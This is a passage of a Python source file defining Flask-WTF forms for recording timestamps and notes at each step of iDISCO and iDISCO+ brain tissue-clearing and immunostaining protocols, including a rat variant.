datetimeformat='%Y-%m-%dT%H:%M' # To get form.field.data to work. Does not work with the default (bug)
def OptionalDateField(description='', validators=None):
    """Return a DateField whose value may be left blank.

    Appends the wtforms ``Optional()`` validator to a copy of the supplied
    validator list.  Fixed: the original used a mutable default argument
    (``validators=[]``) and appended to it in place, so every call without
    an explicit list accumulated one more ``Optional()`` validator (and
    callers' lists were mutated).

    :param description: field label passed through to ``DateField``
    :param validators: optional list of extra wtforms validators
    :return: a ``DateField`` instance
    """
    validators = list(validators) if validators is not None else []
    validators.append(Optional())
    field = DateField(description, validators)
    return field
def OptionalDateTimeLocalField(description='', validators=None, format=datetimeformat):
    """Return a DateTimeLocalField whose value may be left blank.

    Applies an explicit datetime format to work around the default-format
    bug noted at the top of this module, and appends the wtforms
    ``Optional()`` validator to a copy of the supplied validator list.
    Fixed: the original used a mutable default argument (``validators=[]``)
    and appended to it in place, so every call without an explicit list
    accumulated one more ``Optional()`` validator (and callers' lists were
    mutated).

    :param description: field label passed through to ``DateTimeLocalField``
    :param validators: optional list of extra wtforms validators
    :param format: datetime format string (defaults to module-level
        ``datetimeformat``)
    :return: a ``DateTimeLocalField`` instance
    """
    validators = list(validators) if validators is not None else []
    validators.append(Optional())
    field = DateTimeLocalField(description, validators, format=format)
    return field
class iDiscoPlusImmunoForm(FlaskForm):
	""" Form for entering clearing information for the iDISCO+
	immunostaining protocol.

	Each protocol step is represented by a repeating four-field pattern:
	a ``time_<step>`` optional datetime, its ``_submit`` button, a
	``<step>_notes`` length-limited text area, and its ``_notes_submit``
	button. Each protocol phase also has an optional ``<phase>_date``
	field with a submit button labeled 'Push date to calendar (optional)'.
	The bare triple-quoted strings below are section markers separating
	the protocol phases.
	"""
	title = 'iDISCO+ Immunostaining'
	exp_notes = TextAreaField('Experiment Notes: If anything unusual happened during the \
	experiment that might affect clearing, please note it here.',validators=[Length(max=500)])
	exp_notes_submit = SubmitField('Update')
	""" Dehydration """
	dehydr_date = OptionalDateField('Dehydration')
	dehydr_date_submit = SubmitField('Push date to calendar (optional)')
	time_dehydr_pbs_wash1 = OptionalDateTimeLocalField('1xPBS 30 min R@RT')
	time_dehydr_pbs_wash1_submit = SubmitField('Update')
	dehydr_pbs_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	dehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_pbs_wash2 = OptionalDateTimeLocalField('2xPBS 30 min R@RT')
	time_dehydr_pbs_wash2_submit = SubmitField('Update')
	dehydr_pbs_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
	dehydr_pbs_wash2_notes_submit = SubmitField('Update Notes')
	time_dehydr_pbs_wash3 = OptionalDateTimeLocalField('3xPBS 30 min R@RT')
	time_dehydr_pbs_wash3_submit = SubmitField('Update')
	dehydr_pbs_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
	dehydr_pbs_wash3_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
	time_dehydr_methanol_20percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	dehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
	time_dehydr_methanol_40percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	dehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
	time_dehydr_methanol_60percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	dehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
	time_dehydr_methanol_80percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	dehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (first hour)')
	time_dehydr_methanol_100percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	dehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (second hour)')
	time_dehydr_methanol_100percent_wash2_submit = SubmitField('Update')
	dehydr_methanol_100percent_wash2_notes = TextAreaField('Notes',validators=[Length(max=200)])
	dehydr_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
	time_dehydr_peroxide_wash1 = OptionalDateTimeLocalField('5% peroxide (30%) in methanol(100%) O/N R@RT (1 part peroxide5 parts methanol)')
	time_dehydr_peroxide_wash1_submit = SubmitField('Update')
	dehydr_peroxide_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	dehydr_peroxide_wash1_notes_submit = SubmitField('Update Notes')
	""" Rehydration """
	rehydr_date = OptionalDateField('Rehydration')
	rehydr_date_submit = SubmitField('Push date to calendar (optional)')
	time_rehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr')
	time_rehydr_methanol_100percent_wash1_submit = SubmitField('Update')
	rehydr_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	rehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
	time_rehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
	time_rehydr_methanol_80percent_wash1_submit = SubmitField('Update')
	rehydr_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	rehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
	time_rehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
	time_rehydr_methanol_60percent_wash1_submit = SubmitField('Update')
	rehydr_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	rehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
	time_rehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
	time_rehydr_methanol_40percent_wash1_submit = SubmitField('Update')
	rehydr_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	rehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
	time_rehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
	time_rehydr_methanol_20percent_wash1_submit = SubmitField('Update')
	rehydr_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=200)])
	rehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
	time_rehydr_pbs_wash1 = OptionalDateTimeLocalField('PBS R@RTx1hr')
	time_rehydr_pbs_wash1_submit = SubmitField('Update')
	rehydr_pbs_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	rehydr_pbs_wash1_notes_submit = SubmitField('Update Notes')
	time_rehydr_sodium_azide_wash1 = OptionalDateTimeLocalField('0.2%TritonX-100/1xPBS/0.1% sodium azide R@RTx1hr (first hour)')
	time_rehydr_sodium_azide_wash1_submit = SubmitField('Update')
	rehydr_sodium_azide_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	rehydr_sodium_azide_wash1_notes_submit = SubmitField('Update Notes')
	time_rehydr_sodium_azide_wash2 = OptionalDateTimeLocalField('0.2%TritonX-100/1xPBS/0.1% sodium azide R@RTx1hr (second hour)')
	time_rehydr_sodium_azide_wash2_submit = SubmitField('Update')
	rehydr_sodium_azide_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
	rehydr_sodium_azide_wash2_notes_submit = SubmitField('Update Notes')
	time_rehydr_glycine_wash1 = OptionalDateTimeLocalField('20%DMSO/0.3M glycine/0.2% TritonX-100/0.1%sodium azide/1xPBS R@37C for 2 days')
	time_rehydr_glycine_wash1_submit = SubmitField('Update')
	rehydr_glycine_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	rehydr_glycine_wash1_notes_submit = SubmitField('Update Notes')
	""" Blocking """
	blocking_date = OptionalDateField('Blocking')
	blocking_date_submit = SubmitField('Push date to calendar (optional)')
	time_blocking_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
	time_blocking_start_roomtemp_submit = SubmitField('Update')
	blocking_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
	blocking_start_roomtemp_notes_submit = SubmitField('Update Notes')
	time_blocking_donkey_serum = OptionalDateTimeLocalField('10% DMSO / 6% Donkey seum / 0.2%TritonX-100 / 0.1%sodium azide / 1xPBS, R@37°C for 2-3 days')
	time_blocking_donkey_serum_submit = SubmitField('Update')
	blocking_donkey_serum_notes = TextAreaField('Notes',validators=[Length(max=100)])
	blocking_donkey_serum_notes_submit = SubmitField('Update Notes')
	""" Primary Antibody """
	antibody1_date = OptionalDateField('Primary Antibody')
	antibody1_date_submit = SubmitField('Push date to calendar (optional)')
	antibody1_lot = TextAreaField('Enter the primary antibody lot code:',validators=[Length(max=64)])
	antibody1_lot_submit = SubmitField('Update lot')
	time_antibody1_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
	time_antibody1_start_roomtemp_submit = SubmitField('Update')
	antibody1_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
	antibody1_start_roomtemp_notes_submit = SubmitField('Update Notes')
	time_antibody1_ptwh_wash1 = OptionalDateTimeLocalField('PTwH R@RTx1hr (first hour)')
	time_antibody1_ptwh_wash1_submit = SubmitField('Update')
	antibody1_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	antibody1_ptwh_wash1_notes_submit = SubmitField('Update Notes')
	time_antibody1_ptwh_wash2 = OptionalDateTimeLocalField('PTwH R@RTx1hr (second hour)')
	time_antibody1_ptwh_wash2_submit = SubmitField('Update')
	antibody1_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
	antibody1_ptwh_wash2_notes_submit = SubmitField('Update Notes')
	time_antibody1_added = OptionalDateTimeLocalField('Primary antibody (5% DMSO, 3% donkey serum in PTwH); 37C 7d')
	time_antibody1_added_submit = SubmitField('Update')
	antibody1_added_notes = TextAreaField('Notes',validators=[Length(max=100)])
	antibody1_added_notes_submit = SubmitField('Update Notes')
	""" Wash 1 """
	wash1_date = OptionalDateField('Wash')
	wash1_date_submit = SubmitField('Push date to calendar (optional)')
	time_wash1_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
	time_wash1_start_roomtemp_submit = SubmitField('Update')
	wash1_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash1_start_roomtemp_notes_submit = SubmitField('Update Notes')
	time_wash1_ptwh_wash1 = OptionalDateTimeLocalField('PTwH 10 min')
	time_wash1_ptwh_wash1_submit = SubmitField('Update')
	wash1_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash1_ptwh_wash1_notes_submit = SubmitField('Update Notes')
	time_wash1_ptwh_wash2 = OptionalDateTimeLocalField('PTwH 15 min')
	time_wash1_ptwh_wash2_submit = SubmitField('Update')
	wash1_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash1_ptwh_wash2_notes_submit = SubmitField('Update Notes')
	time_wash1_ptwh_wash3 = OptionalDateTimeLocalField('PTwH 30 min')
	time_wash1_ptwh_wash3_submit = SubmitField('Update')
	wash1_ptwh_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash1_ptwh_wash3_notes_submit = SubmitField('Update Notes')
	time_wash1_ptwh_wash4 = OptionalDateTimeLocalField('PTwH 1 hr')
	time_wash1_ptwh_wash4_submit = SubmitField('Update')
	wash1_ptwh_wash4_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash1_ptwh_wash4_notes_submit = SubmitField('Update Notes')
	time_wash1_ptwh_wash5 = OptionalDateTimeLocalField('PTwH 2 hr')
	time_wash1_ptwh_wash5_submit = SubmitField('Update')
	wash1_ptwh_wash5_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash1_ptwh_wash5_notes_submit = SubmitField('Update Notes')
	time_wash1_ptwh_wash6 = OptionalDateTimeLocalField('Overnight wash')
	time_wash1_ptwh_wash6_submit = SubmitField('Update')
	wash1_ptwh_wash6_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash1_ptwh_wash6_notes_submit = SubmitField('Update Notes')
	""" Secondary Antibody """
	antibody2_date = OptionalDateField('Secondary Antibody')
	antibody2_date_submit = SubmitField('Push date to calendar (optional)')
	antibody2_lot = TextAreaField('Enter the secondary antibody lot code:',validators=[Length(max=64)])
	antibody2_lot_submit = SubmitField('Update lot')
	time_antibody2_added = OptionalDateTimeLocalField('2nd antibody solution R@37°C for 7 days (3% donkey serum/PTwH)')
	time_antibody2_added_submit = SubmitField('Update')
	antibody2_added_notes = TextAreaField('Notes',validators=[Length(max=100)])
	antibody2_added_notes_submit = SubmitField('Update Notes')
	""" Wash 2 """
	wash2_date = OptionalDateField('Wash')
	wash2_date_submit = SubmitField('Push date to calendar (optional)')
	time_wash2_start_roomtemp = OptionalDateTimeLocalField('Sample R@RT for ~1.5hrs')
	time_wash2_start_roomtemp_submit = SubmitField('Update')
	wash2_start_roomtemp_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash2_start_roomtemp_notes_submit = SubmitField('Update Notes')
	time_wash2_ptwh_wash1 = OptionalDateTimeLocalField('PTwH 10 min')
	time_wash2_ptwh_wash1_submit = SubmitField('Update')
	wash2_ptwh_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash2_ptwh_wash1_notes_submit = SubmitField('Update Notes')
	time_wash2_ptwh_wash2 = OptionalDateTimeLocalField('PTwH 15 min')
	time_wash2_ptwh_wash2_submit = SubmitField('Update')
	wash2_ptwh_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash2_ptwh_wash2_notes_submit = SubmitField('Update Notes')
	time_wash2_ptwh_wash3 = OptionalDateTimeLocalField('PTwH 30 min')
	time_wash2_ptwh_wash3_submit = SubmitField('Update')
	wash2_ptwh_wash3_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash2_ptwh_wash3_notes_submit = SubmitField('Update Notes')
	time_wash2_ptwh_wash4 = OptionalDateTimeLocalField('PTwH 1 hr')
	time_wash2_ptwh_wash4_submit = SubmitField('Update')
	wash2_ptwh_wash4_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash2_ptwh_wash4_notes_submit = SubmitField('Update Notes')
	time_wash2_ptwh_wash5 = OptionalDateTimeLocalField('PTwH 2 hr')
	time_wash2_ptwh_wash5_submit = SubmitField('Update')
	wash2_ptwh_wash5_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash2_ptwh_wash5_notes_submit = SubmitField('Update Notes')
	time_wash2_ptwh_wash6 = OptionalDateTimeLocalField('Overnight wash')
	time_wash2_ptwh_wash6_submit = SubmitField('Update')
	wash2_ptwh_wash6_notes = TextAreaField('Notes',validators=[Length(max=100)])
	wash2_ptwh_wash6_notes_submit = SubmitField('Update Notes')
	""" Clearing """
	clearing_date = OptionalDateField('Clearing')
	clearing_date_submit = SubmitField('Push date to calendar (optional)')
	time_clearing_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
	time_clearing_methanol_20percent_wash1_submit = SubmitField('Update')
	clearing_methanol_20percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
	time_clearing_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
	time_clearing_methanol_40percent_wash1_submit = SubmitField('Update')
	clearing_methanol_40percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
	time_clearing_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
	time_clearing_methanol_60percent_wash1_submit = SubmitField('Update')
	clearing_methanol_60percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
	time_clearing_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
	time_clearing_methanol_80percent_wash1_submit = SubmitField('Update')
	clearing_methanol_80percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
	time_clearing_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (hour 1)')
	time_clearing_methanol_100percent_wash1_submit = SubmitField('Update')
	clearing_methanol_100percent_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
	time_clearing_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (hour 2)')
	time_clearing_methanol_100percent_wash2_submit = SubmitField('Update')
	clearing_methanol_100percent_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
	time_clearing_dcm_66percent_methanol_33percent = OptionalDateTimeLocalField('66% DCM / 33% methanol R@RTx3hrs')
	time_clearing_dcm_66percent_methanol_33percent_submit = SubmitField('Update')
	clearing_dcm_66percent_methanol_33percent_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_dcm_66percent_methanol_33percent_notes_submit = SubmitField('Update Notes')
	time_clearing_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 1)')
	time_clearing_dcm_wash1_submit = SubmitField('Update')
	clearing_dcm_wash1_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_dcm_wash1_notes_submit = SubmitField('Update Notes')
	time_clearing_dcm_wash2 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 2)')
	time_clearing_dcm_wash2_submit = SubmitField('Update')
	clearing_dcm_wash2_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_dcm_wash2_notes_submit = SubmitField('Update Notes')
	time_clearing_dbe = OptionalDateTimeLocalField('100% DBE > hr')
	time_clearing_dbe_submit = SubmitField('Update')
	clearing_dbe_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_dbe_notes_submit = SubmitField('Update Notes')
	time_clearing_new_tubes = OptionalDateTimeLocalField('put brains in new tubes with prepoured 100% DBE no rocking')
	time_clearing_new_tubes_submit = SubmitField('Update')
	clearing_new_tubes_notes = TextAreaField('Notes',validators=[Length(max=100)])
	clearing_new_tubes_notes_submit = SubmitField('Update Notes')
	clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
	clearing_notes_submit = SubmitField('Update')
	submit = SubmitField('Submit')
class iDiscoAbbreviatedForm(FlaskForm):
	""" Form for entering clearing information for the abbreviated iDISCO
	protocol (non-oxidative fluorophores).

	Fields follow the same repeating pattern as the other clearing forms:
	``time_<step>`` optional datetime + submit button, and
	``<step>_notes`` text area + submit button, grouped by protocol phase
	(PBS wash, then dehydration through DBE).
	"""
	title = 'iDISCO for non-oxidative fluorophores (abbreviated clearing)'
	exp_notes = TextAreaField('Experiment Notes: If anything unusual happened during \
	the experiment that might affect clearing, please note it here.',validators=[Length(max=500)])
	exp_notes_submit = SubmitField('Update')
	pbs_date = OptionalDateField('PBS wash')
	pbs_date_submit = SubmitField('Push date to calendar (optional)')
	time_pbs_wash1 = OptionalDateTimeLocalField('Wash 1')
	time_pbs_wash1_submit = SubmitField('Update')
	pbs_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	pbs_wash1_notes_submit = SubmitField('Update Notes')
	time_pbs_wash2 = OptionalDateTimeLocalField('Wash 2')
	time_pbs_wash2_submit = SubmitField('Update')
	pbs_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	pbs_wash2_notes_submit = SubmitField('Update Notes')
	time_pbs_wash3 = OptionalDateTimeLocalField('Wash 3')
	time_pbs_wash3_submit = SubmitField('Update')
	pbs_wash3_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	pbs_wash3_notes_submit = SubmitField('Update Notes')
	dehydr_date = OptionalDateField('Dehydration')
	dehydr_date_submit = SubmitField('Push date to calendar (optional)')
	time_dehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTx1hr')
	time_dehydr_methanol_20percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_20percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTx1hr')
	time_dehydr_methanol_40percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_40percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTx1hr')
	time_dehydr_methanol_60percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_60percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTx1hr')
	time_dehydr_methanol_80percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_80percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (first hour)')
	time_dehydr_methanol_100percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_100percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTx1hr (second hour)')
	time_dehydr_methanol_100percent_wash2_submit = SubmitField('Update')
	dehydr_methanol_100percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
	time_dehydr_dcm_66percent_methanol_33percent = OptionalDateTimeLocalField('66% DCM / 33% methanol R@RTx3hrs')
	time_dehydr_dcm_66percent_methanol_33percent_submit = SubmitField('Update')
	dehydr_dcm_66percent_methanol_33percent_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_dcm_66percent_methanol_33percent_notes_submit = SubmitField('Update Notes')
	time_dehydr_dcm_wash1 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 1)')
	time_dehydr_dcm_wash1_submit = SubmitField('Update')
	dehydr_dcm_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_dcm_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_dcm_wash2 = OptionalDateTimeLocalField('100% DCM R@RTx15 min (wash 2)')
	time_dehydr_dcm_wash2_submit = SubmitField('Update')
	dehydr_dcm_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_dcm_wash2_notes_submit = SubmitField('Update Notes')
	time_dehydr_dbe_wash1 = OptionalDateTimeLocalField('100% DBE > hr')
	time_dehydr_dbe_wash1_submit = SubmitField('Update')
	dehydr_dbe_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_dbe_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_dbe_wash2 = OptionalDateTimeLocalField('100% DBE no rocking')
	time_dehydr_dbe_wash2_submit = SubmitField('Update')
	dehydr_dbe_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_dbe_wash2_notes_submit = SubmitField('Update Notes')
	clearing_notes = TextAreaField('Clearing Notes',validators=[Length(max=500)])
	clearing_notes_submit = SubmitField('Update')
	submit = SubmitField('Submit')
class iDiscoAbbreviatedRatForm(FlaskForm):
	""" Form for entering clearing information for the abbreviated iDISCO
	protocol adapted for rat brains.

	Same repeating field pattern as the other clearing forms
	(``time_<step>`` + submit, ``<step>_notes`` + submit). The
	commented-out field groups below are retired protocol steps kept for
	reference; do not remove without checking the corresponding
	database schema/templates.
	"""
	title = 'Rat: iDISCO for non-oxidative fluorophores (abbreviated clearing)'
	exp_notes = TextAreaField('Experiment Notes: If anything unusual happened \
	during the experiment that might affect clearing, please note it here.',validators=[Length(max=500)])
	exp_notes_submit = SubmitField('Update')
	pbs_date = OptionalDateField('PBS wash')
	pbs_date_submit = SubmitField('Push date to calendar (optional)')
	time_pbs_wash1 = OptionalDateTimeLocalField('1xPBS R@RT30min')
	time_pbs_wash1_submit = SubmitField('Update')
	pbs_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	pbs_wash1_notes_submit = SubmitField('Update Notes')
	time_pbs_wash2 = OptionalDateTimeLocalField('1xPBS R@RT30min')
	time_pbs_wash2_submit = SubmitField('Update')
	pbs_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	pbs_wash2_notes_submit = SubmitField('Update Notes')
	time_pbs_wash3 = OptionalDateTimeLocalField('1xPBS R@RT30min')
	time_pbs_wash3_submit = SubmitField('Update')
	pbs_wash3_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	pbs_wash3_notes_submit = SubmitField('Update Notes')
	dehydr_date = OptionalDateField('Dehydration')
	dehydr_date_submit = SubmitField('Push date to calendar (optional)')
	time_dehydr_methanol_20percent_wash1 = OptionalDateTimeLocalField('20% methanol R@RTX24hrs')
	time_dehydr_methanol_20percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_20percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_20percent_wash1_notes_submit = SubmitField('Update Notes')
	# time_dehydr_methanol_20percent_wash2 = OptionalDateTimeLocalField(Markup('<strike>20% methanol R@RTX3hrs (wash 2/2)</strike>'))
	# time_dehydr_methanol_20percent_wash2_submit = SubmitField('Update')
	# dehydr_methanol_20percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	# dehydr_methanol_20percent_wash2_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_40percent_wash1 = OptionalDateTimeLocalField('40% methanol R@RTX24hrs')
	time_dehydr_methanol_40percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_40percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_40percent_wash1_notes_submit = SubmitField('Update Notes')
	# time_dehydr_methanol_40percent_wash2 = OptionalDateTimeLocalField(Markup('<strike>40% methanol R@RTX3hrs (wash 2/2)</strike>'))
	# time_dehydr_methanol_40percent_wash2_submit = SubmitField('Update')
	# dehydr_methanol_40percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	# dehydr_methanol_40percent_wash2_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_60percent_wash1 = OptionalDateTimeLocalField('60% methanol R@RTX24hrs')
	time_dehydr_methanol_60percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_60percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_60percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_80percent_wash1 = OptionalDateTimeLocalField('80% methanol R@RTX24hrs')
	time_dehydr_methanol_80percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_80percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_80percent_wash1_notes_submit = SubmitField('Update Notes')
	# time_dehydr_methanol_80percent_wash2 = OptionalDateTimeLocalField(Markup('<strike>80% methanol R@RTX24hrs (wash 2/2)</strike>'))
	# time_dehydr_methanol_80percent_wash2_submit = SubmitField('Update')
	# dehydr_methanol_80percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	# dehydr_methanol_80percent_wash2_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_100percent_wash1 = OptionalDateTimeLocalField('100% methanol R@RTX24hrs')
	time_dehydr_methanol_100percent_wash1_submit = SubmitField('Update')
	dehydr_methanol_100percent_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_100percent_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_peroxide_wash1 = OptionalDateTimeLocalField('5% peroxide / Methanol (1 part 30% peroxide: 5 parts 100% methanol) ')
	time_dehydr_peroxide_wash1_submit = SubmitField('Update')
	dehydr_peroxide_wash1_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_peroxide_wash1_notes_submit = SubmitField('Update Notes')
	time_dehydr_methanol_100percent_wash2 = OptionalDateTimeLocalField('100% methanol R@RTX24hrs')
	time_dehydr_methanol_100percent_wash2_submit = SubmitField('Update')
	dehydr_methanol_100percent_wash2_notes = TextAreaField('Notes:',validators=[Length(max=250)])
	dehydr_methanol_100percent_wash2_notes_submit = SubmitField('Update Notes')
	# time_dehydr_methanol_100percent_wash3 = OptionalDateTimeLocalField('100% methanol R@RTX24hrs')
	# time_dehydr_methanol_100percent_wash3_submit = SubmitField('Update')
	# dehydr_methanol_100percent_wash3_notes = TextAreaField('Notes:',validators=[Length(max=250)])
